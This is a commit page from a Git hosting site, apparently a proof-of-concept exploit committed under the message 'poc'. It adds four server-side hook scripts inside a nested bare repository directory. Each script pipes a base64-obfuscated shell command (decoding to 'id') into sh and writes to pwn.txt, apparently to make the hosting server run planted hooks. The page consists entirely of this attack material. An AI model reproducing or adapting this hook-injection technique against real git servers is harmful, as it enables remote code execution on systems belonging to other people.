This website works better with JavaScript
Inicio
Explorar
Axuda
Rexistro
Iniciar sesión
pwn3011
/
w96f1
Seguir
1
Destacar
0
Fork
0
Ficheiros
Incidencias
0
Pull Requests
0
Wiki
Explorar o código
poc
x
hai 1 mes
pai
57d71764a8
achega
0c00f5fa7d
Modificáronse 4 ficheiros
con
8 adicións
e
0 borrados
Dividir vista
Mostrar estatísticas de Diff
2
0
n/r34fd.git/hooks/post-receive
2
0
n/r34fd.git/hooks/post-update
2
0
n/r34fd.git/hooks/pre-receive
2
0
n/r34fd.git/hooks/update
+ 2
- 0
n/r34fd.git/hooks/post-receive
Ver ficheiro
@@ -0,0 +1,2 @@
+#!/bin/sh
+echo '$(echo 'aWQ=' | base64 -d | sh)' > pwn.txt
+ 2
- 0
n/r34fd.git/hooks/post-update
Ver ficheiro
@@ -0,0 +1,2 @@
+#!/bin/sh
+echo '$(echo 'aWQ=' | base64 -d | sh)' > pwn.txt
+ 2
- 0
n/r34fd.git/hooks/pre-receive
Ver ficheiro
@@ -0,0 +1,2 @@
+#!/bin/sh
+echo '$(echo 'aWQ=' | base64 -d | sh)' > pwn.txt
+ 2
- 0
n/r34fd.git/hooks/update
Ver ficheiro
@@ -0,0 +1,2 @@
+#!/bin/sh
+echo '$(echo 'aWQ=' | base64 -d | sh)' > pwn.txt